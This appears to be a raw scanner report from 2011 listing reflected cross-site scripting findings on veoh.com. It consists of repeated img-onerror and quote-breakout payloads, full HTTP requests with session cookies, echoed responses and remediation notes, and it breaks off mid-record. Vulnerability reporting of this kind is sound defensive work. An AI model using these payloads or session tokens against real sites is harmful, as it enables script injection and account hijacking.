__utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=65 Content-Length: 77710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:26 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=72 Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:16 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=43 Content-Length: 76768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=20 Content-Length: 76724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:44 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=86 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=94 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:49 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=9 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:56 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 76407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=16 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/ Date: Thu, 03 Feb 2011 20:32:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=35 Content-Length: 94943
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:38 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:53 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/ Date: Thu, 03 Feb 2011 20:32:05 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 94943
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:09 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=33 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
